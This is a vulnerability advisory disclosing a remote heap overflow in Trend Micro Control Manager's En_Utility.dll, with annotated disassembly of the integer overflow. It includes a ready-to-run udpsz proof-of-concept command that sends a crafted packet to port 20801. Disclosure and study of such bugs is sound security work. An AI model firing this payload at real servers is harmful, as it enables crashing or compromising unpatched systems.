####################################################################### Luigi Auriemma Application: Trend Micro Control Manager http://us.trendmicro.com/us/products/enterprise/control-manager/ note that the vulneable dll seems used also in other Trend Micro products like ServerProtect and OfficeScan (EntityMain.exe? search on google) but I have not verified it yet and, if confirmed, I don't know if must be counted as a separate vulnerability Versions: <= 5.5 1250 Platforms: Windows Bug: heap overflow in En_Utility.dll Exploitation: remote, versus server Date: probably found 21 Nov 2010 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== ??? ####################################################################### ====== 2) Bug ====== CASProcessor.exe is a child service of ProcessManager.exe running on port 20801 and automatically restarted everytime it crashes or terminates. The service is vulnerable to a heap overflow during the handling of the BLOB encrypted data caused by an integer overflow in the following instructions of En_Utility.dll: 100378F3 . 8B08 MOV ECX,DWORD PTR DS:[EAX] ; the 32bit value 100378F5 . 51 PUSH ECX ; 100378F6 . FF15 94130410 CALL DWORD PTR DS:[<&WSOCK32.#14>] ; \ntohl 100378FC . 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 100378FF . 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10] ; input buffer 10037902 . 83C2 04 ADD EDX,4 10037905 . 8955 F0 MOV DWORD PTR SS:[EBP-10],EDX 10037908 . 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10] 1003790B . 0345 FC ADD EAX,DWORD PTR SS:[EBP-4] ; buffer + 32bit value 1003790E . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; input buffer (again) 10037911 . 034D 0C ADD ECX,DWORD PTR SS:[EBP+C] ; buffer + BLOB size we provided 10037914 . 3BC1 CMP EAX,ECX 10037916 . 76 0A JBE SHORT En_Utili.10037922 10037918 . B8 12FCFFFF MOV EAX,-3EE 1003791D . E9 83010000 JMP En_Utili.10037AA5 10037922 . 6A 04 PUSH 4 10037924 . 8D55 FC LEA EDX,DWORD PTR SS:[EBP-4] 10037927 . 52 PUSH EDX 10037928 . 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10] 1003792B . E8 80DAFFFF CALL En_Utili.100353B0 ; copying of 4 bytes 10037930 . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 10037933 . 50 PUSH EAX 10037934 . 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10] 10037937 . 51 PUSH ECX 10037938 . 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10] 1003793B . E8 70DAFFFF CALL En_Utili.100353B0 ; copying of 12 bytes plus those specified in our 32bit and some other integer overflows happen in that 100353B0 function (something like a static_realloc+memcpy) that allow to bypass some checks and exploit the vulnerability since it allocates an amount of memory of only 0x8000 bytes. Such instructions are reached through a packet having opcode 0x1391 "HandleMcpRequest" containing a malformed BLOB encryption data with the opcode 1 or 3 followed by the 32bit field between the range 0xffff8000 and 0xffffffff. Also the opcode 0x13a7 "HandleMsgFromProLib" uses BLOB encrypted data but doesn't call this specific vulnerable function used by 0x1391, that's why only that opcode can exploit the vulnerability. After the heap overflow it's also possible to corrupt additional memory through the sending of other packets with the consequence of controlling registers and possibly the code flow. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip udpsz -b 0x61 -l 0 -c "\x00\x11\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\x91\x13\xff\xff\xff\xff\xff\xffaction=blah&slf_productguid=blah&msgver=blah&\r\n\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\xff\xff\xff\xff" -T SERVER 20801 0x110000 ####################################################################### ====== 4) Fix ====== http://www.zerodayinitiative.com/advisories/ZDI-11-235/ #######################################################################